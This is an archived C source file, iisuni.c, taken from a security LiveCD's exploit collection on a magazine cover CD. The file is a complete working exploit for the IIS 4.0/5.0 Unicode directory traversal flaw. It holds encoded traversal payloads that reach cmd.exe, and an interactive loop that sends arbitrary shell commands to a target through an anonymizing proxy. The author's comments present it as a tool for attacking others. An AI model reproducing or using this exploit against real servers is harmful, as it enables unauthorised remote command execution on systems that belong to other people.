Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / iisuni.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 3.5 KB | 127 lines

/* hack IIS 4.0/5.0 with the usefull UNICODE :) and have fun */ /* coded by zipo */ /* to compile: cc -o iisuni iisuni.c */ /* made for all the lame populus :) */ #include <stdio.h> #include <string.h> #include <sys/socket.h> #include <signal.h> #include <netinet/in.h> #include <netdb.h> #define BUFF_LEN 6000 #define HTTP " HTTP/1.0\r\n\r\n" #define GET "GET http://" /* this is the anonymous server used */ #define ANON "anon.free.anonymizer.com" /* this are all the types of bugs */ #define BUG1_STR "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+" #define BUG2_STR "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+" #define BUG3_STR "/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+" #define BUG4_STR "/" /* this is the IIS http server port */ #define HTTP_PORT 80 int main (int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *he; char *bug,cmd[BUFF_LEN],recbuffer[BUFF_LEN],buffer[BUFF_LEN]; int sck, i; if (argc < 3) bad_params (argv[0]); switch (atoi(argv[2])) { case 1: bug = BUG1_STR; break; case 2: bug = BUG2_STR; break; case 3: bug = BUG3_STR; break; case 4: bug = BUG4_STR; break; default: printf ("Number error\n"); exit(1); } while (1) { printf ("bash# "); fgets (cmd, sizeof(cmd), stdin); cmd[strlen(cmd)-1] = '\0'; if (strcmp(cmd, "exit")) { if (!strcmp(cmd, "clear")) { system("clear"); continue; } else if (!strcmp(cmd, "")) { continue; } else if (!strcmp(cmd, "?")) { printf ("Just you need to type in the prompt the M$DOS command\n"); printf ("to exit type \"exit\" :)\n"); continue; } /* prepare the string to be sent */ for (i=0;i<=strlen(cmd);i++) { if (cmd[i] == 0x20) cmd[i] = 0x2b; } sprintf (buffer, "%s%s%s%s%s", GET, argv[1], bug, cmd, HTTP); /* get ip */ if ((he = gethostbyname (ANON)) == NULL) { herror ("host error"); exit (1); } /* setup port and other parameters */ sin.sin_port = htons (HTTP_PORT); sin.sin_family = AF_INET; memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length); /* create a socket */ if ((sck = socket (AF_INET, SOCK_STREAM, 6)) < 0) { perror ("socket() error"); exit (1); } /* connect to the sucker */ if ((connect (sck, (struct sockaddr *) &sin, sizeof (sin))) < 0) { perror ("connect() error"); exit (1); } /* send the beautifull string */ write (sck, buffer, sizeof(buffer)); /* recive all ! :) */ read (sck, recbuffer, sizeof(recbuffer)); /* and print it */ recbuffer[strlen(recbuffer)-1]='\0'; printf ("\033[0;7m-------------------------------------Received-------------------- ---------------\n"); printf ("%s\n---------------------------------------Done--------------------------- ----------\n\033[7;0m", recbuffer); /* close the socket ... not needed any more */ close (sck); /* put zero's in the buffers */ bzero (buffer, sizeof(buffer)); bzero (recbuffer, sizeof(recbuffer)); } else { /* you type "exit" cya :) */ exit(0); } } } /* you miss a parameter :'-( */ int bad_params (char *prog_name) { fprintf (stdout, "usage:\n\t%s <hostname> <number>\n", prog_name); fprintf (stdout, "-------------------------------------------------------\n"); fprintf (stdout, "<1> msadc\t"); fprintf (stdout, "<2> scripts\t"); fprintf (stdout, "<3> iisadmpwd\t"); fprintf (stdout, "<4> /\n"); fprintf (stdout, "-------------------------------------------------------\n"); exit (1); } /* EOF */